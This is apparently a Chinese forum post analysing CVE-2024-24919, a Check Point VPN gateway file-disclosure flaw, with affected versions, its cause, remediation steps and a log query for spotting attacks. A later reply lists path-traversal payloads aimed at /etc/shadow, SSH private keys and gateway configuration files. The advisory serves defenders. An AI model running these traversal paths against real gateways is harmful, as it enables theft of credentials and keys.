CVE-2024-24919: 深入分析

概述

CVE-2024-24919 是一个严重的信息泄露漏洞,影响 Check Point 的远程访问 VPN 系统。此漏洞允许未经授权的攻击者提取本地账户密码哈希,包括用于连接 Active Directory 的账户哈希。漏洞于 2024 年 4 月首次发现,并已被积极利用。

影响版本

根据 Check Point 官方公告,该漏洞影响以下版本:

  • 产品: Check Point Quantum Security Gateways 和 Check Point CloudGuard Network Security Gateways
  • 版本:
    • R80.20
    • R80.30
    • R80.40
    • R81
    • R81.10
    • 以及启用了 Mobile Access blade 的所有版本

漏洞类型

此漏洞属于信息泄露(Information Disclosure),风险等级为高危。攻击者可以远程提取敏感信息,无需用户交互或特殊权限。

漏洞成因

漏洞源于 Check Point 安全网关中 Mobile Access blade 的设计缺陷,允许攻击者通过特定路径(例如 https://IP/clients/MyCRL)枚举并提取本地账户的密码哈希。

修复与防范

针对 CVE-2024-24919,建议采取以下措施:

  1. 立即更新: 将受影响的系统更新至包含补丁的最新版本。
  2. 移除本地用户: 从网关中移除所有本地用户账户。
  3. 更换密码: 更改用于从网关连接到 Active Directory 的 LDAP 连接密码。
  4. 日志检查: 更新后检查日志中的异常行为或登录记录。
  5. 启用 IPS 规则: 更新 Check Point IPS 签名以检测利用尝试。

此外,通过 SmartConsole 使用查询 action:"Log In" AND auth_method:Password AND blade:"Mobile Access" 来交叉检查登录活动,并在 IDS/IPS 启用的情况下检测到特定 URI 路径以发现利用尝试。

更多详细信息,请参考 Check Point 官方网站mnemonic 的博客 oai_citation:1,Advisories Archive - Check Point Software

    6 天 后
    • ../../../../../../../etc/fstab
    • ../../../../../../../etc/shadow
    • ../../../../../../../sysimg/CPwrapper/SU/Products.conf
    • ../../../../../../../config/db/initial
    • ../../../../../../../etc/passwd
    • ../../../../../../../home//.ssh/authorized_keys
    • ../../../../../../../opt/checkpoint/conf/
    • ../../../../../../../etc/ssh/sshd_config
    • ../../../../../../../etc/vpn/vpn.conf
    • ../../../../../../../home//.ssh/id_rsa
    • ../../../../../../../home/*/.ssh/known_hosts
    • ../../../../../../../home/root/.ssh/authorized_keys
      说点什么吧...